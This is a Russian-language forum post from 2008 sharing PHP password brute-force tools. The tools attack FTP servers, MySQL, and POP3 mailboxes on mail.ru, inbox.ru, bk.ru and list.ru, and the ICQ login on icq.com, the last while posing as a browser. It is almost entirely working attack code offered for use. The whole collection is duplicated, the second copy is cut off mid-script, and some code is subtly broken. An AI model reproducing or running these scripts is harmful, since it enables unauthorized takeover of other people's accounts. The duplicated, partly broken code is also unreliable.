XaCeRoC
07.07.2008, 12:38
Ftp brute
<?php
set_time_limit(0);
$host = "host.ru"; // указываем хост
$port = 21; // указываем порт
$uid_file = file("login.txt"); // файл с именами
$pwd_file = file("passw.txt"); // файл с паролями
$brute_save = fopen("brute_save_ftp.txt","a+"); // сюда пишем удачно сбрутенные аккаунты
$yes_connect = 0;
$no_connect = 0;
if($conn = @ftp_connect($host, $port)) {
for($i=0; $i<count($uid_file); $i++) {
$login = trim($uid_file[$i]);
for($j=0; $j<count($pwd_file); $j++) {
$passwd = trim($pwd_file[$j]);
if($ftp_conn = @ftp_login($conn, $login, $passwd)) {
fputs($brute_save, date("d.m.y H:i:s")."|HOST: ".$host."|Login: ".$login."|Password: ".$passwd."\r\n");
ftp_quit($conn);
$yes_connect++;
}
else {
$no_connect++;
continue;
}
}
}
}
else {
echo "<font face=Tahoma color=#444444 size=2>Не удалось установить связь с $host</font><br>";
exit();
}
echo "<font face=Tahoma color=#444444 size=2>Удачных подключений: $yes_connect</font><br>";
echo "<font face=Tahoma color=red size=2>Неудачных попыток: $no_connect</font><br>";
$show_brute = file("brute_save_ftp.txt");
for($i=0; $i<count($show_brute); $i++) {
list($dates, $host, $login, $passwd) = explode("|", $show_brute[$i]);
echo "<font face=Tahoma color=#runthes size=2>[".$dates."][".$host."][".$login."][".$passwd."]</font><br>";
}
?>
SQL Brute
<?php
$host = "localhost"; // указываем хост на котором стоит мускуль
$port = "3306"; // указываем порт мускуля
$uid_file = file("login.txt"); // файл с именами
$pwd_file = file("passw.txt"); // файл с паролями
$brute_save = fopen("brute_save.txt","a+"); // сюда пишем удачно сбрутенные аккаунты
$yes_connect = 0;
$no_connect = 0;
for($i=0; $i<count($uid_file); $i++) {
$login = trim($uid_file[$i]);
for($j=0; $j<count($pwd_file); $j++) {
$passwd = trim($pwd_file[$j]);
if($conn = @mysql_connect($host.":".$port, $login, $passwd)) {
flock($brute_save, 3);
fputs($brute_save, date("d.m.y H:i:s")."|HOST: ".$host."|Login: ".$login."|Password: ".$passwd."\r\n");
flock($brute_save, 1);
mysql_close($conn);
$yes_connect++;
}
else {
$no_connect++;
continue;
}
}
}
echo "<font face=Tahoma color=#444444 size=2>Удачных подключений: $yes_connect</font><br>";
echo "<font face=Tahoma color=red size=2>Неудачных попыток: $no_connect</font><br>";
$show_brute = file("brute_save.txt");
for($i=0; $i<count($show_brute); $i++) {
list($dates, $host, $login, $passwd) = explode("|", $show_brute[$i]);
echo "<font face=Tahoma color=#runthes size=2>[".$dates."][".$host."][".$login."][".$passwd."]</font><br>";
}
?>
Mail Brute
brute_mail.php
<?php
set_time_limit(0);
$user_login = file("user_mail.txt");
$uesr_passwd = file("user_passwd.txt");
$apop = 0;
include_once("./pop3.php");
for($i=0; $i<count($user_login); $i++) {
$u_login = trim($user_login[$i]);
for($j=0; $j<count($user_passwd); $j++) {
$u_passwd = trim($user_passwd[$j]);
$pop3_connection = new pop3_class;
$pop3_connection->hostname = "pop3.mail.ru";
if($pop3_connection->Open()) {
if($pop3_connection->Login($u_login, $u_passwd, $apop)) {
echo "Congritulation!";
$pop3_connection->Close();
}
else {
echo "SHIT";
}
}
else {
echo "Failed!";
exit();
}
}
}
?>
pop3.php
<?
class pop3_class
{
var $hostname="";
var $port=110;
var $connection=0;
var $state="DISCONNECTED";
var $greeting="";
var $must_update=0;
Function GetLine()
{
for($line="";
{
if(feof($this->connection))
return(0);
$line.=fgets($this->connection,100);
$length=strlen($line);
if($length>=2
&& substr($line,$length-2,2)=="\r\n")
return(substr($line,0,$length-2));
}
}
Function PutLine($line)
{
return(fputs($this->connection,"$line\r\n"));
}
Function OpenConnection()
{
if($this->hostname=="")
return("2 it was not specified a valid hostname");
switch(($this->connection=fsockopen($this->hostname,$this->port)))
{
case -3:
return("-3 socket could not be created");
case -4:
return("-4 dns lookup on hostname \"$hostname\" failed");
case -5:
return("-5 connection refused or timed out");
case -6:
return("-6 fdopen() call failed");
case -7:
return("-7 setvbuf() call failed");
default:
return("");
}
}
Function CloseConnection()
{
if($this->connection!=0)
{
fclose($this->connection);
$this->connection=0;
}
}
Function Open()
{
if($this->state!="DISCONNECTED")
return("1 a connection is already opened");
if(($error=$this->OpenConnection())!="")
return($error);
$this->greeting=$this->GetLine();
if(GetType($this->greeting)!="string"
|| strtok($this->greeting," ")!="+OK")
{
$this->CloseConnection();
return("3 POP3 server greeting was not found");
}
$this->greeting=strtok("\r\n");
$this->must_update=0;
$this->state="AUTHORIZATION";
return("");
}
Function Close()
{
if($this->state=="DISCONNECTED")
return("no connection was opened");
if($this->must_update)
{
if($this->PutLine("QUIT")==0)
return("Could not send the QUIT command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get quit command response");
if(strtok($response," ")!="+OK")
return("Could not quit the connection: ".strtok("\r\n"));
}
$this->CloseConnection();
$this->state="DISCONNECTED";
return("");
}
Function Login($user,$password,$apop)
{
if($this->state!="AUTHORIZATION")
return("connection is not in AUTHORIZATION state");
if($apop)
{
if($this->PutLine("APOP $user ".md5($this->greeting.$password))==0)
return("Could not send the APOP command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get APOP login command response");
if(strtok($response," ")!="+OK")
return("APOP login failed: ".strtok("\r\n"));
}
else
{
if($this->PutLine("USER $user")==0)
return("Could not send the USER command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get user login entry response");
if(strtok($response," ")!="+OK")
return("User error: ".strtok("\r\n"));
if($this->PutLine("PASS $password")==0)
return("Could not send the PASS command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get login password entry response");
if(strtok($response," ")!="+OK")
return("Password error: ".strtok("\r\n"));
}
$this->state="TRANSACTION";
return("");
}
Function Statistics($messages,$size)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("STAT")==0)
return("Could not send the STAT command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get the statistics command response");
if(strtok($response," ")!="+OK")
return("Could not get the statistics: ".strtok("\r\n"));
$messages=strtok(" ");
$size=strtok(" ");
return("");
}
Function ListMessages($message,$unique_id)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($unique_id)
$list_command="UIDL";
else
$list_command="LIST";
if($this->PutLine("$list_command $message")==0)
return("Could not send the $list_command command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message list command response");
if(strtok($response," ")!="+OK")
return("Could not get the message listing: ".strtok("\r\n"));
if($message=="")
{
for($messages=array();
{
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message list response");
if($response==".")
break;
$message=intval(strtok($response," "));
if($unique_id)
$messages[$message]=strtok(" ");
else
$messages[$message]=intval(strtok(" "));
}
return($messages);
}
else
{
$message=intval(strtok(" "));
return(intval(strtok(" ")));
}
}
Function RetrieveMessage($message,$headers,$body,$lines)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($lines<0)
{
$command="RETR";
$arguments="$message";
}
else
{
$command="TOP";
$arguments="$message $lines";
}
if($this->PutLine("$command $arguments")==0)
return("Could not send the $command command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message retrieval command response");
if(strtok($response," ")!="+OK")
return("Could not retrieve the message: ".strtok("\r\n"));
for($headers=$body=array(),$line=0;;$line++)
{
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not retrieve the message");
switch($response)
{
case ".":
return("");
case "":
break 2;
default:
if(substr($response,0,1)==".")
$response=substr($response,1,strlen($response)-1);
break;
}
$headers[$line]=$response;
}
for($line=0;;$line++)
{
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not retrieve the message");
switch($response)
{
case ".":
return("");
default:
if(substr($response,0,1)==".")
$response=substr($response,1,strlen($response)-1);
break;
}
$body[$line]=$response;
}
return("");
}
Function DeleteMessage($message)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("DELE $message")==0)
return("Could not send the DELE command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message delete command response");
if(strtok($response," ")!="+OK")
return("Could not delete the message: ".strtok("\r\n"));
$this->must_update=1;
return("");
}
Function ResetDeletedMessages()
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("RSET")==0)
return("Could not send the RSET command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get reset deleted messages command response");
if(strtok($response," ")!="+OK")
return("Could not reset deleted messages: ".strtok("\r\n"));
$this->must_update=0;
return("");
}
Function IssueNOOP()
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("NOOP")==0)
return("Could not send the NOOP command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not NOOP command response");
if(strtok($response," ")!="+OK")
return("Could not issue the NOOP command: ".strtok("\r\n"));
return("");
}
};
PHP Simple mail.ru brute
<html>
<head>
<title>MailBrute By Joker-jar</title>
<meta http-equiv=Content-Type content="text/html; charset=windows-1251">
</head>
<body>
<?
set_time_limit(0);
ignore_user_abort(1);
error_reporting(0);
$servers = Array(
"mail" => "pop3.mail.ru",
"inbox" => "pop3.inbox.ru",
"bk" => "pop3.bk.ru",
"list" => "pop3.list.ru",
);
$pop3port = 110;
$passfile = "pass.txt";
$good = "good.txt";
$bad = "bad.txt";
function CheckPass($pop3server, $username, $pass)
{
global $pop3port;
$fp = fsockopen($pop3server, $pop3port, $errno, $errstr, 30);
if (!$fp)
return false;
$buf = fgets($fp, 128);
if ($buf[0] != "+")
{
fclose($fp);
return false;
}
fputs($fp,"user ".$username."\r\n");
$buf = fgets($fp, 128);
if ($buf[0] != "+")
{
fclose($fp);
return false;
}
fputs($fp,"pass ".$pass."\r\n");
$buf = fgets($fp, 128);
if (strlen($buf) > 3 && $buf[0] == "+")
{
fclose($fp);
return true;
}
fclose($fp);
return false;
}
function genstr($l, $alf)
{
$result = "";
for ($i=0;$i<$l;$i++)
$result .= $alf[0];
return $result;
}
function nextpass($p, $alf)
{
for ($i=0;$i<strlen($p);$i++)
{
if (strpos($alf,$p[$i]) == strlen($alf)-1)
{
$p[$i] = $alf[0];
}
else
{
$p[$i] = $alf[strpos($alf,$p[$i])+1];
return $p;
}
}
$p .= $alf[0];
return $p;
}
if (isset($_POST["name"]))
{
if ($_POST["name"] === "")
{
echo "Отсутствует имя</body></html>";
exit;
}
if (!isset($servers[$_POST["popserver"]]))
{
echo "Неправильно задан pop3 сервер</body></html>";
exit;
}
settype($_POST["minl"],"int");
settype($_POST["maxl"],"int");
if ($_POST["minl"] == 0 || $_POST["maxl"] == 0 || $_POST["maxl"] - $_POST["minl"] < 0)
{
echo "Ошибка в параметрах длины пароля</body></html>";
exit;
}
if ($_POST["dict"] !== "yes" && $_POST["alf"] === "")
{
echo "Алфавит пуст</body></html>";
exit;
}
if ($_POST["dict"] === "yes" && (!file_exists($passfile) || filesize($passfile) == 0))
{
echo "Файл $passfile пуст или отсутствует</body></html>";
exit;
}
if ($_POST["dict"] !== "yes")
{
//Полный перебор
$startpass = genstr($_POST["minl"],$_POST["alf"]);
$endpass = genstr($_POST["maxl"]+1,$_POST["alf"]);
$curpass = $startpass;
while ($curpass != $endpass)
{
if (CheckPass($servers[$_POST["popserver"]], $_POST["name"], $curpass))
{
$f = fopen($good, 'ab');
fwrite($f, $_POST["name"]." : ".$curpass."\r\n");
fclose($f);
exit;
}
else
{
$f = fopen($bad, 'ab');
fwrite($f, $_POST["name"]." : ".$curpass."\r\n");
fclose($f);
}
$curpass = nextpass($curpass,$_POST["alf"]);
}
}
else
{
//Атака по словарю
$passes = file($passfile);
for($i=0; $i<count($passes);$i++)
{
$curpass = trim($passes[$i]);
if (CheckPass($servers[$_POST["popserver"]], $_POST["name"], $curpass))
{
$f = fopen($good, 'ab');
fwrite($f, $_POST["name"]." : ".$curpass."\r\n");
fclose($f);
exit;
}
else
{
$f = fopen($bad, 'ab');
fwrite($f, $_POST["name"]." : ".$curpass."\r\n");
fclose($f);
}
}
}
}
?>
<fieldset style="width: 500">
<legend>Параметры брута</legend>
<form method="POST">
<table border="0">
<tr><td>
<input type="text" name="name" style="width: 100">
</td><td>@
<select name="popserver" style="width: 100">
<option value="mail" selected>mail.ru
<option value="inbox">inbox.ru
<option value="bk">bk.ru
<option value="list">list.ru
</select>
</td></tr>
<tr><td colspan="2"><br>
<input type="radio" name=dict value="yes" checked>Атака по словарю pass.txt<br>
<input type="radio" name=dict value="no">Атака полным перебором
</td></tr>
<tr><td style="text-align: right">
алфавит:
</td><td>
<input type="text" name="alf" style="width: 200" value="abcdefghijklmnopqrstuvwxyz">
</td></tr>
<tr><td style="text-align: right">
мин длина:
</td><td>
<input type="text" name="minl" style="width: 50" value="1">
</td></tr>
<tr><td style="text-align: right">
макс длина:
</td><td>
<input type="text" name="maxl" style="width: 50" value="5">
</td></tr>
<tr><td colspan="2">
<br>
<input type="submit" value="Начать брут и идти спать">
</td></tr>
</table>
</form>
</fieldset>
</body>
</html>
Artix ICQ phpBrute
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Artix ICQ phpBrute</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body>
<?
///Для того, чтбы скрипт бесконечно работал
set_time_limit(0);
///Чтобы все ошибки показывал
Error_Reporting(E_ALL & ~E_NOTICE);
///Константы, просьба не менять
$config=array();
$config['good']='./.htgood.txt'; ///Складывать хорошие номера суда(рекомендую приставку .ht, тогда файл нельзя будет из веб прочитать)
$config['pass']='./pass.txt'; ///Лист паролей
$config['separator']=';'; /// Разделитель уин;pass
$config['host']='www.icq.com'; /// HTTP сервер мирабов
$config['port']=80; /// HTTP порт
$config['statfile']='./stat.html'; ///Служебный файл
///Если брутер запущен, то выдаем результат работы
if(file_exists($config['statfile']))
{
include($config['statfile']);
echo '
</body>
</html>';
exit();
}
///Типа притворяемся браузером
$request = "POST /karma/login.php HTTP/1.1\r\n";
$request .= "Host: ".$config['host']." \r\n";
$request .= "User-Agent: Opera 7.50";
$request .= "rulez\r\n";
$request .= "Keep-Alive: 300\r\n";
$request .= "Connection: keep-alive\r\n";
$request .= "Referer: http://yandex.ru/ \r\n";
///Плохие и хорошие уины
$goodcount=0;
$badcount=0;
///Открытие файла с паролями
$pass=file($config['pass']);
///Непосредственно брут
for($i=0;$i<count($pass);$i++)
{
list($s,$s1)=explode($config['separator'],$pass[$i]);
///Данные для отправки к мирабам
$posts = array ( 'dest' => '/whitepages/user_details.php',
'desc' => '',
'service' => '20',
'css'=> 'whitepages',
'uin_email'=> $s,
'password' => trim($s1)
);
$postValues="";
$s='';
///Кодирование
foreach( $posts AS $name => $value )
{
$postValues .= urlencode($name) . "=" . urlencode($value) . '&';
}
///Создаем post запрос
$lenght = strlen($postValues);
$request2 = $request."Content-Type: application/x-www-form-urlencoded\r\n";
$request2 .= "Content-Length: $lenght\r\n";
$request2 .= "\r\n";
$request2 .= $postValues;
///Открываем сокет
$fp = fsockopen($config['host'],$config['port'], $errno, $errstr, 30);
if (!$fp)
{
///На случай ошибки
echo "$errstr ($errno)<br />\n";
}
else
{
///Отправляем данные на whitepages
fwrite($fp, $request2);
while (!feof($fp))
{
$s.=fgets($fp, 128);
}
}
///Закрываем сокет
fclose($fp);
///Если аська залогинилась, то whitepages посылает куки, которые мы и ловим. Всю страницу мы не скачиваем
if(strpos($s,'Set-C*****')==true)
{
$good=fopen($config['good'],'a');
fwrite($good,$pass[$i]);
fclose($good);
$goodcount++;
}
else $badcount++;
if($i%10==0)
{
$count=count($pass)-$i;
///Обновление статистики
$s=<<<HTML
--------------------------<br>
<b>Artix ICQ phpBrute</b> <br>
--------------------------<br>
Хороших: $goodcount<br>
Плохих: $badcount<br>
Осталось: $count<br>
---<br>
HTML;
$stat=fopen($config['statfile'],'w+');
fwrite($stat,$s);
fclose($stat);
}
}
$s=<<<HTML
--------------------------<br>
<b>Artix ICQ phpBrute</b> <br>
--------------------------<br>
Работа завершена. <br>
Хороших: $goodcount<br>
Плохих: $badcount<br>
Для продолжения, удалите файл со статистикой<br>
---<br>
HTML;
///Запись конечного результата в файл
$stat=fopen($config['statfile'],'w+');
fwrite($stat,$s);
fclose($stat);
///Брут завершен
?>
©Tyson
<?php
set_time_limit(0);
$host = "host.ru"; // указываем хост
$port = 21; // указываем порт
$uid_file = file("login.txt"); // файл с именами
$pwd_file = file("passw.txt"); // файл с паролями
$brute_save = fopen("brute_save_ftp.txt","a+"); // сюда пишем удачно сбрутенные аккаунты
$yes_connect = 0;
$no_connect = 0;
if($conn = @ftp_connect($host, $port)) {
for($i=0; $i<count($uid_file); $i++) {
$login = trim($uid_file[$i]);
for($j=0; $j<count($pwd_file); $j++) {
$passwd = trim($pwd_file[$j]);
if($ftp_conn = @ftp_login($conn, $login, $passwd)) {
fputs($brute_save, date("d.m.y H:i:s")."|HOST: ".$host."|Login: ".$login."|Password: ".$passwd."\r\n");
ftp_quit($conn);
$yes_connect++;
}
else {
$no_connect++;
continue;
}
}
}
}
else {
echo "<font face=Tahoma color=#444444 size=2>Не удалось установить связь с $host</font><br>";
exit();
}
echo "<font face=Tahoma color=#444444 size=2>Удачных подключений: $yes_connect</font><br>";
echo "<font face=Tahoma color=red size=2>Неудачных попыток: $no_connect</font><br>";
$show_brute = file("brute_save_ftp.txt");
for($i=0; $i<count($show_brute); $i++) {
list($dates, $host, $login, $passwd) = explode("|", $show_brute[$i]);
echo "<font face=Tahoma color=#runthes size=2>[".$dates."][".$host."][".$login."][".$passwd."]</font><br>";
}
?>
SQL Brute
<?php
$host = "localhost"; // указываем хост на котором стоит мускуль
$port = "3306"; // указываем порт мускуля
$uid_file = file("login.txt"); // файл с именами
$pwd_file = file("passw.txt"); // файл с паролями
$brute_save = fopen("brute_save.txt","a+"); // сюда пишем удачно сбрутенные аккаунты
$yes_connect = 0;
$no_connect = 0;
for($i=0; $i<count($uid_file); $i++) {
$login = trim($uid_file[$i]);
for($j=0; $j<count($pwd_file); $j++) {
$passwd = trim($pwd_file[$j]);
if($conn = @mysql_connect($host.":".$port, $login, $passwd)) {
flock($brute_save, 3);
fputs($brute_save, date("d.m.y H:i:s")."|HOST: ".$host."|Login: ".$login."|Password: ".$passwd."\r\n");
flock($brute_save, 1);
mysql_close($conn);
$yes_connect++;
}
else {
$no_connect++;
continue;
}
}
}
echo "<font face=Tahoma color=#444444 size=2>Удачных подключений: $yes_connect</font><br>";
echo "<font face=Tahoma color=red size=2>Неудачных попыток: $no_connect</font><br>";
$show_brute = file("brute_save.txt");
for($i=0; $i<count($show_brute); $i++) {
list($dates, $host, $login, $passwd) = explode("|", $show_brute[$i]);
echo "<font face=Tahoma color=#runthes size=2>[".$dates."][".$host."][".$login."][".$passwd."]</font><br>";
}
?>
Mail Brute
brute_mail.php
<?php
set_time_limit(0);
$user_login = file("user_mail.txt");
$uesr_passwd = file("user_passwd.txt");
$apop = 0;
include_once("./pop3.php");
for($i=0; $i<count($user_login); $i++) {
$u_login = trim($user_login[$i]);
for($j=0; $j<count($user_passwd); $j++) {
$u_passwd = trim($user_passwd[$j]);
$pop3_connection = new pop3_class;
$pop3_connection->hostname = "pop3.mail.ru";
if($pop3_connection->Open()) {
if($pop3_connection->Login($u_login, $u_passwd, $apop)) {
echo "Congritulation!";
$pop3_connection->Close();
}
else {
echo "SHIT";
}
}
else {
echo "Failed!";
exit();
}
}
}
?>
pop3.php
<?
class pop3_class
{
var $hostname="";
var $port=110;
var $connection=0;
var $state="DISCONNECTED";
var $greeting="";
var $must_update=0;
Function GetLine()
{
for($line="";
{
if(feof($this->connection))
return(0);
$line.=fgets($this->connection,100);
$length=strlen($line);
if($length>=2
&& substr($line,$length-2,2)=="\r\n")
return(substr($line,0,$length-2));
}
}
Function PutLine($line)
{
return(fputs($this->connection,"$line\r\n"));
}
Function OpenConnection()
{
if($this->hostname=="")
return("2 it was not specified a valid hostname");
switch(($this->connection=fsockopen($this->hostname,$this->port)))
{
case -3:
return("-3 socket could not be created");
case -4:
return("-4 dns lookup on hostname \"$hostname\" failed");
case -5:
return("-5 connection refused or timed out");
case -6:
return("-6 fdopen() call failed");
case -7:
return("-7 setvbuf() call failed");
default:
return("");
}
}
Function CloseConnection()
{
if($this->connection!=0)
{
fclose($this->connection);
$this->connection=0;
}
}
Function Open()
{
if($this->state!="DISCONNECTED")
return("1 a connection is already opened");
if(($error=$this->OpenConnection())!="")
return($error);
$this->greeting=$this->GetLine();
if(GetType($this->greeting)!="string"
|| strtok($this->greeting," ")!="+OK")
{
$this->CloseConnection();
return("3 POP3 server greeting was not found");
}
$this->greeting=strtok("\r\n");
$this->must_update=0;
$this->state="AUTHORIZATION";
return("");
}
Function Close()
{
if($this->state=="DISCONNECTED")
return("no connection was opened");
if($this->must_update)
{
if($this->PutLine("QUIT")==0)
return("Could not send the QUIT command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get quit command response");
if(strtok($response," ")!="+OK")
return("Could not quit the connection: ".strtok("\r\n"));
}
$this->CloseConnection();
$this->state="DISCONNECTED";
return("");
}
Function Login($user,$password,$apop)
{
if($this->state!="AUTHORIZATION")
return("connection is not in AUTHORIZATION state");
if($apop)
{
if($this->PutLine("APOP $user ".md5($this->greeting.$password))==0)
return("Could not send the APOP command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get APOP login command response");
if(strtok($response," ")!="+OK")
return("APOP login failed: ".strtok("\r\n"));
}
else
{
if($this->PutLine("USER $user")==0)
return("Could not send the USER command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get user login entry response");
if(strtok($response," ")!="+OK")
return("User error: ".strtok("\r\n"));
if($this->PutLine("PASS $password")==0)
return("Could not send the PASS command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get login password entry response");
if(strtok($response," ")!="+OK")
return("Password error: ".strtok("\r\n"));
}
$this->state="TRANSACTION";
return("");
}
Function Statistics($messages,$size)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("STAT")==0)
return("Could not send the STAT command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get the statistics command response");
if(strtok($response," ")!="+OK")
return("Could not get the statistics: ".strtok("\r\n"));
$messages=strtok(" ");
$size=strtok(" ");
return("");
}
Function ListMessages($message,$unique_id)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($unique_id)
$list_command="UIDL";
else
$list_command="LIST";
if($this->PutLine("$list_command $message")==0)
return("Could not send the $list_command command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message list command response");
if(strtok($response," ")!="+OK")
return("Could not get the message listing: ".strtok("\r\n"));
if($message=="")
{
for($messages=array();
{
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message list response");
if($response==".")
break;
$message=intval(strtok($response," "));
if($unique_id)
$messages[$message]=strtok(" ");
else
$messages[$message]=intval(strtok(" "));
}
return($messages);
}
else
{
$message=intval(strtok(" "));
return(intval(strtok(" ")));
}
}
Function RetrieveMessage($message,$headers,$body,$lines)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($lines<0)
{
$command="RETR";
$arguments="$message";
}
else
{
$command="TOP";
$arguments="$message $lines";
}
if($this->PutLine("$command $arguments")==0)
return("Could not send the $command command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message retrieval command response");
if(strtok($response," ")!="+OK")
return("Could not retrieve the message: ".strtok("\r\n"));
for($headers=$body=array(),$line=0;;$line++)
{
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not retrieve the message");
switch($response)
{
case ".":
return("");
case "":
break 2;
default:
if(substr($response,0,1)==".")
$response=substr($response,1,strlen($response)-1);
break;
}
$headers[$line]=$response;
}
for($line=0;;$line++)
{
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not retrieve the message");
switch($response)
{
case ".":
return("");
default:
if(substr($response,0,1)==".")
$response=substr($response,1,strlen($response)-1);
break;
}
$body[$line]=$response;
}
return("");
}
Function DeleteMessage($message)
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("DELE $message")==0)
return("Could not send the DELE command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get message delete command response");
if(strtok($response," ")!="+OK")
return("Could not delete the message: ".strtok("\r\n"));
$this->must_update=1;
return("");
}
Function ResetDeletedMessages()
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("RSET")==0)
return("Could not send the RSET command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not get reset deleted messages command response");
if(strtok($response," ")!="+OK")
return("Could not reset deleted messages: ".strtok("\r\n"));
$this->must_update=0;
return("");
}
Function IssueNOOP()
{
if($this->state!="TRANSACTION")
return("connection is not in TRANSACTION state");
if($this->PutLine("NOOP")==0)
return("Could not send the NOOP command");
$response=$this->GetLine();
if(GetType($response)!="string")
return("Could not NOOP command response");
if(strtok($response," ")!="+OK")
return("Could not issue the NOOP command: ".strtok("\r\n"));
return("");
}
};
PHP Simple mail.ru brute
<html>
<head>
<title>MailBrute By Joker-jar</title>
<meta http-equiv=Content-Type content="text/html; charset=windows-1251">
</head>
<body>
<?
set_time_limit(0);
ignore_user_abort(1);
error_reporting(0);
$servers = Array(
"mail" => "pop3.mail.ru",
"inbox" => "pop3.inbox.ru",
"bk" => "pop3.bk.ru",
"list" => "pop3.list.ru",
);
$pop3port = 110;
$passfile = "pass.txt";
$good = "good.txt";
$bad = "bad.txt";
function CheckPass($pop3server, $username, $pass)
{
global $pop3port;
$fp = fsockopen($pop3server, $pop3port, $errno, $errstr, 30);
if (!$fp)
return false;
$buf = fgets($fp, 128);
if ($buf[0] != "+")
{
fclose($fp);
return false;
}
fputs($fp,"user ".$username."\r\n");
$buf = fgets($fp, 128);
if ($buf[0] != "+")
{
fclose($fp);
return false;
}
fputs($fp,"pass ".$pass."\r\n");
$buf = fgets($fp, 128);
if (strlen($buf) > 3 && $buf[0] == "+")
{
fclose($fp);
return true;
}
fclose($fp);
return false;
}
function genstr($l, $alf)
{
$result = "";
for ($i=0;$i<$l;$i++)
$result .= $alf[0];
return $result;
}
function nextpass($p, $alf)
{
for ($i=0;$i<strlen($p);$i++)
{
if (strpos($alf,$p[$i]) == strlen($alf)-1)
{
$p[$i] = $alf[0];
}
else
{
$p[$i] = $alf[strpos($alf,$p[$i])+1];
return $p;
}
}
$p .= $alf[0];
return $p;
}
if (isset($_POST["name"]))
{
if ($_POST["name"] === "")
{
echo "Отсутствует имя</body></html>";
exit;
}
if (!isset($servers[$_POST["popserver"]]))
{
echo "Неправильно задан pop3 сервер</body></html>";
exit;
}
settype($_POST["minl"],"int");
settype($_POST["maxl"],"int");
if ($_POST["minl"] == 0 || $_POST["maxl"] == 0 || $_POST["maxl"] - $_POST["minl"] < 0)
{
echo "Ошибка в параметрах длины пароля</body></html>";
exit;
}
if ($_POST["dict"] !== "yes" && $_POST["alf"] === "")
{
echo "Алфавит пуст</body></html>";
exit;
}
if ($_POST["dict"] === "yes" && (!file_exists($passfile) || filesize($passfile) == 0))
{
echo "Файл $passfile пуст или отсутствует</body></html>";
exit;
}
if ($_POST["dict"] !== "yes")
{
//Полный перебор
$startpass = genstr($_POST["minl"],$_POST["alf"]);
$endpass = genstr($_POST["maxl"]+1,$_POST["alf"]);
$curpass = $startpass;
while ($curpass != $endpass)
{
if (CheckPass($servers[$_POST["popserver"]], $_POST["name"], $curpass))
{
$f = fopen($good, 'ab');
fwrite($f, $_POST["name"]." : ".$curpass."\r\n");
fclose($f);
exit;
}
else
{
$f = fopen($bad, 'ab');
fwrite($f, $_POST["name"]." : ".$curpass."\r\n");
fclose($f);
}
$curpass = nextpass($curpass,$_POST["alf"]);
}
}
else
{
//Атака по словарю
$passes = file($passfile);
for($i=0; $i<count($passes);$i++)
{
$curpass = trim($passes[$i]);
if (CheckPass($servers[$_POST["popserver"]], $_POST["name"], $curpass))
{
$f = fopen($good, 'ab');
fwrite($f, $_POST["name"]." : ".$curpass."\r\n");
fclose($f);
exit;
}
else
{
$f = fopen($bad, 'ab');
fwrite($f, $_POST["name"]." : ".$curpass."\r\n");
fclose($f);
}
}
}
}
?>
<fieldset style="width: 500">
<legend>Параметры брута</legend>
<form method="POST">
<table border="0">
<tr><td>
<input type="text" name="name" style="width: 100">
</td><td>@
<select name="popserver" style="width: 100">
<option value="mail" selected>mail.ru
<option value="inbox">inbox.ru
<option value="bk">bk.ru
<option value="list">list.ru
</select>
</td></tr>
<tr><td colspan="2"><br>
<input type="radio" name=dict value="yes" checked>Атака по словарю pass.txt<br>
<input type="radio" name=dict value="no">Атака полным перебором
</td></tr>
<tr><td style="text-align: right">
алфавит:
</td><td>
<input type="text" name="alf" style="width: 200" value="abcdefghijklmnopqrstuvwxyz">
</td></tr>
<tr><td style="text-align: right">
мин длина:
</td><td>
<input type="text" name="minl" style="width: 50" value="1">
</td></tr>
<tr><td style="text-align: right">
макс длина:
</td><td>
<input type="text" name="maxl" style="width: 50" value="5">
</td></tr>
<tr><td colspan="2">
<br>
<input type="submit" value="Начать брут и идти спать">
</td></tr>
</table>
</form>
</fieldset>
</body>
</html>
Artix ICQ phpBrute
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Artix ICQ phpBrute</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body>
<?
///Для того, чтбы скрипт бесконечно работал
set_time_limit(0);
///Чтобы все ошибки показывал
Error_Reporting(E_ALL & ~E_NOTICE);
///Константы, просьба не менять
